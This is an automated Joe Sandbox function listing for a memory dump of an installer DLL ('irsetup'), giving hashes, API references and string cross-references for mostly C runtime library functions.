Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: ed92aab74e24e1c157c9003b9606fb17f54fc7dbdfdefb113adb3dab755d3dc2
Instruction ID: 14398583cd06948a384385bef8cd944388f3e303429900c163158203f3a44866
Opcode Fuzzy Hash: ed92aab74e24e1c157c9003b9606fb17f54fc7dbdfdefb113adb3dab755d3dc2
Instruction Fuzzy Hash: 87218032300A8896EBBB9B25D9553DBB3A0F78C789F418125E75D87396DF38D668C700

Function 000000018003715C Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 0000000180037183
GetLocaleInfoA.KERNEL32 ref: 00000001800371B8

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: 3c3da7c936a9a1d7d7928e9dc572b502ff7468b01418821e0a10ab2f620c66c2
Instruction ID: a232d29d29e465a5efbbe9cce7ee2381c15c0905e4f694560ebf159723a5cdbb
Opcode Fuzzy Hash: 3c3da7c936a9a1d7d7928e9dc572b502ff7468b01418821e0a10ab2f620c66c2
Instruction Fuzzy Hash: A9219D32300A8896EB6BDB64E8853DA73A0F38CB88F458126EA5D87755CF38D659C740

Function 0000000180037244 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 0000000180037285

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6db5ba4383936ebe8e135fc20a07d54cabfd9c019b671f35b81fbb6f7a59b079
Instruction ID: 1779db9e300c3f0be7c9e9f2cf91417e77d66518fa8146c6749ef4c91204d209
Opcode Fuzzy Hash: 6db5ba4383936ebe8e135fc20a07d54cabfd9c019b671f35b81fbb6f7a59b079
Instruction Fuzzy Hash: D911543231468D89EBB35765E4903EB6390A39D7CCF558532FA8D46286CE28C64E8710

Function 000000018003769C Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(?,?,00000140,000000018003786E,?,?,?,?,00000000,0000000180028F80), ref: 00000001800376EC

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: a772892202ddaf5bc622bbe73f4b19016f8f684e91aec17a0921c547e3cf381a
Instruction ID: f37fcbef81f8ea48d901cc4db84f161ea8b218e8b27c5afce3cbb95621750e1d
Opcode Fuzzy Hash: a772892202ddaf5bc622bbe73f4b19016f8f684e91aec17a0921c547e3cf381a
Instruction Fuzzy Hash: B8115E767046088BFBAB9B31C4563EB23A1F358B8DF158815E60D46287CB78C6A98781

Function 0000000180037730 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(?,?,00000140,0000000180037836,?,?,?,?,00000000,0000000180028F80), ref: 0000000180037765

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 00904e545afd1d8bcc4d25644970bc411eaa74f4fe036e873c08ffc18f5239ee
Instruction ID: 536939a62cb50f1254b4d1823daa1212530eac2b623dc0f81497a316b2726411
Opcode Fuzzy Hash: 00904e545afd1d8bcc4d25644970bc411eaa74f4fe036e873c08ffc18f5239ee
Instruction Fuzzy Hash: CAF0AF76704A4C8AF7AB8B31C4563EB27D1A398B88F19C015EA0D422D7DE78C6998741

Function 000000018003A528 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

GetLocaleInfoW.KERNEL32 ref: 000000018003A558

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale_getptd
String ID:
API String ID: 3731964398-0
Opcode ID: 30b74f351a9049185b5c7b206bcb158cb25f0595aff4ca38198320f560619d19
Instruction ID: e8c26664117332e88b1dd3b4d098a9168b36064e77387e33d55b75928aa8ea7e
Opcode Fuzzy Hash: 30b74f351a9049185b5c7b206bcb158cb25f0595aff4ca38198320f560619d19
Instruction Fuzzy Hash: AAF05432614A8482D7518B15E44439AA760F7C8BE0F588210FB9D57B69CE28C9568B40

Function 000000018003D408 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000018003D430

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ff4c1dfb36b85c262c150c417b3b8a7bb35bc48b0e0c663feccef2f2a2400bd6
Instruction ID: 54e8e65f8259819ee4ef56e8d4dbd3fa1e1d9d900539162f45c44271054f6398
Opcode Fuzzy Hash: ff4c1dfb36b85c262c150c417b3b8a7bb35bc48b0e0c663feccef2f2a2400bd6
Instruction Fuzzy Hash: 3CE06575218A8881F773D710E8013DB3750B79D7D8F814207F58C466A5DE3CC3598B00

Function 0000000180036164 Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0000000180036179

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 0000000180036182
free.LIBCMT ref: 000000018003618B
free.LIBCMT ref: 0000000180036194
free.LIBCMT ref: 000000018003619D
free.LIBCMT ref: 00000001800361A6
free.LIBCMT ref: 00000001800361AE
free.LIBCMT ref: 00000001800361B7
free.LIBCMT ref: 00000001800361C0
free.LIBCMT ref: 00000001800361C9
free.LIBCMT ref: 00000001800361D2
free.LIBCMT ref: 00000001800361DB
free.LIBCMT ref: 00000001800361E4
free.LIBCMT ref: 00000001800361ED
free.LIBCMT ref: 00000001800361F6
free.LIBCMT ref: 00000001800361FF
free.LIBCMT ref: 000000018003620B
free.LIBCMT ref: 0000000180036217
free.LIBCMT ref: 0000000180036223
free.LIBCMT ref: 000000018003622F
free.LIBCMT ref: 000000018003623B
free.LIBCMT ref: 0000000180036247
free.LIBCMT ref: 0000000180036253
free.LIBCMT ref: 000000018003625F
free.LIBCMT ref: 000000018003626B
free.LIBCMT ref: 0000000180036277
free.LIBCMT ref: 0000000180036283
free.LIBCMT ref: 000000018003628F
free.LIBCMT ref: 000000018003629B
free.LIBCMT ref: 00000001800362A7
free.LIBCMT ref: 00000001800362B3
free.LIBCMT ref: 00000001800362BF
free.LIBCMT ref: 00000001800362CB
free.LIBCMT ref: 00000001800362D7
free.LIBCMT ref: 00000001800362E3
free.LIBCMT ref: 00000001800362EF
free.LIBCMT ref: 00000001800362FB
free.LIBCMT ref: 0000000180036307
free.LIBCMT ref: 0000000180036313
free.LIBCMT ref: 000000018003631F
free.LIBCMT ref: 000000018003632B
free.LIBCMT ref: 0000000180036337
free.LIBCMT ref: 0000000180036343

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: 2f2d5588e97d756e9a577e36f27ed1f0fafce1ce69f8890a1f8447804ed0654a
Instruction ID: 03925525cb8416a551a9b4b4029cb5bf65b7929adb151452348da2fa71f7cf51
Opcode Fuzzy Hash: 2f2d5588e97d756e9a577e36f27ed1f0fafce1ce69f8890a1f8447804ed0654a
Instruction Fuzzy Hash: 7F416532611E4881EBA6AB75C4513FC2321ABC8BC4F048132F95D9B7A7CE10CB598354

Function 000000018003A1F8 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A235
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A251
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A279
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A282
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A298
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2A1
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2B7
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2C0
GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2DE
EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2E7
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A319
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A328
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A380
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A3A0
DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A3B9

Strings

GetActiveWindow, xrefs: 000000018003A268
MessageBoxA, xrefs: 000000018003A247
GetProcessWindowStation, xrefs: 000000018003A2D4
GetUserObjectInformationA, xrefs: 000000018003A2A6
GetLastActivePopup, xrefs: 000000018003A287
USER32.DLL, xrefs: 000000018003A22E

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3085332118-232180764
Opcode ID: 8f431ba8dc0e35966c13d23202dae3974de4cf8e8649169e699a89669a8de12d
Instruction ID: dfefc03f7fba11b39094b96e9353418926974b70fd291aca694570e016384653
Opcode Fuzzy Hash: 8f431ba8dc0e35966c13d23202dae3974de4cf8e8649169e699a89669a8de12d
Instruction Fuzzy Hash: 6E513E31606B0880FDE7DB56BC957EA23906B4EBC4F4A8425BD4D037A2EE78C74D8354

Function 000000018002B1B8 Relevance: 30.5, APIs: 20, Instructions: 485COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002B1EB
_errno.LIBCMT ref: 000000018002B1F4
__doserrno.LIBCMT ref: 000000018002B24E
_errno.LIBCMT ref: 000000018002B255

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 83bcc1b7ed02ac48ed80f5db585f6cc6e072ce756355eb0b1e4c509f4418eeb5
Instruction ID: 55b8966ed909c531b91f61cb8372e423ff6e17214bc975dbaad7cba1e7de9a49
Opcode Fuzzy Hash: 83bcc1b7ed02ac48ed80f5db585f6cc6e072ce756355eb0b1e4c509f4418eeb5
Instruction Fuzzy Hash: BF22F472204AC882E7E39B55E4843ED2B91F3897D4F98C516FA5A877D2DE38C64DC302

Function 000000018002CB8C Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018002CBDD
_wsopen_s.LIBCMT ref: 000000018002CE0B

Strings

, xrefs: 000000018002CBC9
r, xrefs: 000000018002CBD3
, xrefs: 000000018002CDE7
UTF-16LE, xrefs: 000000018002CD9A
a, xrefs: 000000018002CBCE
, xrefs: 000000018002CD36
UTF-8, xrefs: 000000018002CD77
w, xrefs: 000000018002CBD8
ccs, xrefs: 000000018002CD3B
UNICODE, xrefs: 000000018002CDBD
, xrefs: 000000018002CD61
, xrefs: 000000018002CD72
=, xrefs: 000000018002CD66

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno_wsopen_s
String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
API String ID: 1497100469-1561892669
Opcode ID: 809ac7aed290ffe497205082508d5eeb03938b6ee526942d5b77e887368b1888
Instruction ID: d6da21fed4115c722398ce3e3561bd801ec631ccb665ac6cd961f74e4c6af8c6
Opcode Fuzzy Hash: 809ac7aed290ffe497205082508d5eeb03938b6ee526942d5b77e887368b1888
Instruction Fuzzy Hash: BF81B3B2A0824C45FBF74A25A904FEA5FC1675D7C4F29C425FE4A069D6DE79CB488303

Function 00000001800383A0 Relevance: 24.3, APIs: 16, Instructions: 348COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 000000018003840D
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 0000000180038421
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 0000000180038524

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CompareErrorInfoLastString
String ID:
API String ID: 3723911898-0
Opcode ID: a7c54db4274c7bd852224f2bab33c57a8df35dff28d89205a04333a6085d80a5
Instruction ID: caf065914ce32c901bdc0da071f13ae403a8d6858991746fbe812b61d08b1fd8
Opcode Fuzzy Hash: a7c54db4274c7bd852224f2bab33c57a8df35dff28d89205a04333a6085d80a5
Instruction Fuzzy Hash: 77E1AE722047888AEBB39F2194443EA2B92BB497D4F56C565FA5A47BC4DF38CB489700

Function 000000018003CAA8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 197processsynchronizationCOMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018003CAF1
_errno.LIBCMT ref: 000000018003CAF8
__doserrno.LIBCMT ref: 000000018003CC73
CreateProcessA.KERNEL32 ref: 000000018003CCBE
GetLastError.KERNEL32 ref: 000000018003CCC6
free.LIBCMT ref: 000000018003CCD7
WaitForSingleObject.KERNEL32 ref: 000000018003CD03
GetExitCodeProcess.KERNEL32 ref: 000000018003CD16
CloseHandle.KERNEL32 ref: 000000018003CD34
CloseHandle.KERNEL32 ref: 000000018003CD46
_errno.LIBCMT ref: 000000018003CD51

Strings

cmd.exe, xrefs: 000000018003CAB3

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CloseHandleProcess__doserrno_errno$CodeCreateErrorExitLastObjectSingleWaitfree
String ID: cmd.exe
API String ID: 1143201056-723907552
Opcode ID: 1ec64bca767f0ce2c30d7568805568113e7c73b22f9ca0acadf98c084daf04b7
Instruction ID: bc4d664b3f0a0b6ab182b77c7d05c4b3f8bc629965aac2ee09c429f38f9c3594
Opcode Fuzzy Hash: 1ec64bca767f0ce2c30d7568805568113e7c73b22f9ca0acadf98c084daf04b7
Instruction Fuzzy Hash: 4181B432204A8881EBA38B25E4817EF7761F3897E4F56C212FA59837D1DF79C649C702

Function 00000001800124E0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 179COMMON

Download Yara Rule

APIs

Part of subcall function 000000018002753C: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,000000018001252F), ref: 000000018002754A

Part of subcall function 000000018002721C: __getgmtimebuf.LIBCMT ref: 000000018002722E

wcsftime.LIBCMT ref: 0000000180012761

Strings

min, xrefs: 00000001800125F5
day, xrefs: 0000000180012637
month, xrefs: 000000018001265D
year, xrefs: 0000000180012687
hour, xrefs: 0000000180012616
wday, xrefs: 00000001800126AD
sec, xrefs: 00000001800125D4
yday, xrefs: 00000001800126D3
%, xrefs: 000000018001271D
isdst, xrefs: 00000001800126FC
!, xrefs: 000000018001254D

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Time$FileSystem__getgmtimebufwcsftime
String ID: !$%$day$hour$isdst$min$month$sec$wday$yday$year
API String ID: 599264643-611614131
Opcode ID: e8d60ccf7bee7e749e5e1b2cbf8c68d472027f5cf3e427ad52023df90c5721df
Instruction ID: 3f311966028a47db9d835d2390ad335689aacd3f767fa76c62ac224867e760a9
Opcode Fuzzy Hash: e8d60ccf7bee7e749e5e1b2cbf8c68d472027f5cf3e427ad52023df90c5721df
Instruction Fuzzy Hash: 1F71B271204AC889EBA6EB21E4513EA7352EB8D7D1F48C212BD5A073DADE38C70DC740

Function 0000000180028660 Relevance: 18.1, APIs: 11, Strings: 1, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00000001800286AC

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Part of subcall function 0000000180036640: free.LIBCMT ref: 000000018003665E
Part of subcall function 0000000180036640: free.LIBCMT ref: 0000000180036670
Part of subcall function 0000000180036640: free.LIBCMT ref: 0000000180036682
Part of subcall function 0000000180036640: free.LIBCMT ref: 0000000180036694
Part of subcall function 0000000180036640: free.LIBCMT ref: 00000001800366A6
Part of subcall function 0000000180036640: free.LIBCMT ref: 00000001800366B8
Part of subcall function 0000000180036640: free.LIBCMT ref: 00000001800366CA

free.LIBCMT ref: 00000001800286CE
free.LIBCMT ref: 00000001800286E6
free.LIBCMT ref: 00000001800286F2
free.LIBCMT ref: 0000000180028716
free.LIBCMT ref: 000000018002872A
free.LIBCMT ref: 0000000180028739
free.LIBCMT ref: 0000000180028745
free.LIBCMT ref: 0000000180028772
free.LIBCMT ref: 000000018002879A
free.LIBCMT ref: 00000001800287B4

Strings

%.14g, xrefs: 000000018002866A

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID: %.14g
API String ID: 1012874770-3267037135
Opcode ID: 47d9f555a568b6f0783db94f213f62370508f50826c306b4ac1c19de6a4250bd
Instruction ID: af0bc440c63a20798cdb7aeb7fc5255632f61c08f109e4c0f4434e2bfff94dc4
Opcode Fuzzy Hash: 47d9f555a568b6f0783db94f213f62370508f50826c306b4ac1c19de6a4250bd
Instruction Fuzzy Hash: EF41EE36602A8884EFE79F65D4553FC2360AB8CBD8F188432FA194A795CF74CB99D710

Function 000000018002C2FC Relevance: 18.1, APIs: 12, Instructions: 82COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 000000018002C31B

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 000000018002C329
free.LIBCMT ref: 000000018002C337
free.LIBCMT ref: 000000018002C345
free.LIBCMT ref: 000000018002C353
free.LIBCMT ref: 000000018002C361
free.LIBCMT ref: 000000018002C372
free.LIBCMT ref: 000000018002C38A
_lock.LIBCMT ref: 000000018002C394
free.LIBCMT ref: 000000018002C3C2
_lock.LIBCMT ref: 000000018002C3D7
free.LIBCMT ref: 000000018002C421

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_lock$ErrorFreeHeapLast_errno
String ID:
API String ID: 1575098132-0
Opcode ID: 45039a1f34f5a8ca6a309a91bc759b7c570e1b30efeed7530d3bf206d5ce8a12
Instruction ID: cb46baaaa23a1663d07188939efbc8fc8364fa3fc97ea10782da97baff015f18
